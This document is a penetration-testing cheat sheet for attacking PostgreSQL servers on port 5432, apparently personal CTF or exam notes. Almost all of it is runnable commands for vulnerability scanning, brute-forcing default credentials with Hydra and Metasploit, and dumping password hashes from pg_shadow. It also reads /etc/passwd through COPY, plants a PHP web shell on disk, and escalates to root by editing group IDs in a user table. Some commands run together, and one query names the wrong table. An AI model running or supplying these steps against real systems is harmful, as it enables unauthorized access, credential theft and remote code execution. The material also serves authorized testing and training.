PostgreSQL - Port 5432
PostgreSQL, also known as Postgres, is a powerful open-source object-relational database system. It has earned a strong reputation for its proven architecture, reliability, data integrity, robust feature set, and extensibility.
Identify PostgreSQL
nmap -sV -p 5432 <target-host>
nmap Scanning
nmap -sC -sV --script vuln,vulners --script-args mincvss=7.0 -p5432,5433 -Pn 10.10.10.10
#make sure to check for vulnerable versions
nmap -sV -p 5432 <target-host>
Exploiting Known Vulnerabilities
searchsploit postgresql <version>
Enumerating Databases and Tables
List all databases
\l
Switch to a database
\c <database_name>
List tables in the current database:
\dt
Extract data from a specific table:
SELECT * FROM <table_name>;
Dumping Hashes
SELECT usename, passwd FROM pg_shadow;
Accessing File System
COPY (SELECT * FROM sensitive_table) TO '/tmp/sensitive_data.txt';Bruteforcing Postgres Creds
#Using Metasploit
use auxiliary/scanner/postgres/postgres_login
#using Hydra
hydra -L /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt -P /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt 10.10.10.10 postgres
Default Username & Passwords:
● postgres : postgres
● postgres : password
● postgres : admin
● admin : admin
● admin : password
root : root
#or for a better wordlist
cp /usr/share/wordlists/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt .
cat postgres-betterdefaultpasslist.txt | cut -f1 -d":" > user.txt
cat postgres-betterdefaultpasslist.txt | cut -f2 -d":" > pass.txtAccessing remote Postgresql server
psql -h 10.10.10.10 -U USERNAME
psql -h <host> -U <username> -d <database>PrivEsc when Postgresql Is Running As Root
psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr //Enter Password later
\dt \\List Tables
\dp \\Get DB privileges
select * from table_name; \\ Check Home Directory (just in case)
Example to Update a value in all rows:
update table_name set gid=0 where gid=1001; \Giving Root Privs
or
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');Reading files via Postgres
use auxiliary/admin/postgres/postgres_readfile
#Downloading a file
> create table new(file TEXT);
COPY new FROM '/etc/passwd';
select * from hack;
#Uploading a file
create table new(put TEXT);
INSERT INTO new(put) VALUES('<?php @system("$_GET[cmd]");?>');
COPY new(put) TO '/tmp/temp.php';Dumping Hashes
auxiliary/admin/postgres/postgres_sql
>select usename, passwd from pg_shadow;
auxiliary/scanner/postgres/postgres_hashdump